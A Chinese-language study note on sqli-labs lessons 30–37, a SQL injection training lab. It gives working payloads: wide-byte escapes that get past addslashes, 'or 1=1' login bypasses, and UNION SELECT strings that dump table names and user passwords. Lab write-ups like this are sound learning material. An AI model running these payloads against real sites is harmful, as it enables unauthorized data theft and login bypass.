sqli-labs学习笔记 DAY6

DAY 6

sqli-labs lesson 30

• 与上一题一样，需要用到HPP
• 查看源代码，参数两边加上了双引号，直接使用lesson 26a与lesson 27a的脚本即可

sqli-labs lesson 31

• 闭合符号为双引号加括号
• 直接报错型注入

sqli-labs lesson 32(Jsp)

• 这一题直接用Jsp处理的一个参数即可
• 闭合符号为单引号与括号，直接报错注入

sqli-labs lesson 32(php)

• 宽字节注入：https://www.cnblogs.com/xishaonian/p/6063961.html
• 思路：由源码，这道题过滤单引号，并且形成’这样的字符，所以我们的想法就是把\“吃掉”或者在他前面再加一个\。'的十六进制为0x5c，0x25所以URL编码为%5c%27，可以在前面加一个%df，形成%df%5c%27，也就是输入参数时，提交%df%27，过滤后形成三个字符，这三个字符在SQL中，因为编码设置为GBK，所以前面两个%df%5c会形成一个汉字，这样，%27就独立出来了。
• 其他的直接使用联合查询语句即可

sqli-labs lesson 33

• addslashes()：

  addslashes() 函数在指定的预定义字符前添加反斜杠。这些字符是单引号（’）、双引号（"）、反斜线（\）与NUL（NULL字符）。

• 和上一题一样

sqli-labs lesson 34

• 这一关是POST方式
• 用户名输入：饜’ or 1=1#
• 其中饜是utf-16位995c的汉字，分成其中5c转换成utf-8就是\，相当于我们在\之前又加了一个\来让他失效了

sqli-labs lesson 35

• 爆库：?id=99 UNION SELECT 1,database(),3;–+
• 爆表：?id=99 UNION SELECT 1,group_concat(table_name),3 from information_schema.tables where table_schema=CHAR(115, 101, 99, 117, 114, 105, 116, 121);–+
• 爆字段：?id=99 UNION SELECT 1,group_concat(column_name),3 from information_schema.columns where table_schema=CHAR(115, 101, 99, 117, 114, 105, 116, 121) and table_name=CHAR(117, 115, 101, 114, 115);–+
• 爆记录：?id=99 UNION SELECT 1,group_concat(username),group_concat(password) from security.users;–+

sqli-labs lesson 36

• 宽字节注入，这次用FEFF335c，这是一个有意思的字符，长的这个样子：㍜
• 检测：?id=99㍜’ UNION SELECT 1,2,3;–+
• 其他引号用CHAR()函数绕过

sqli-labs lesson 37

• 和上一题一样，只不过这次是POST
• 用户名：㍜’ or 1=1;#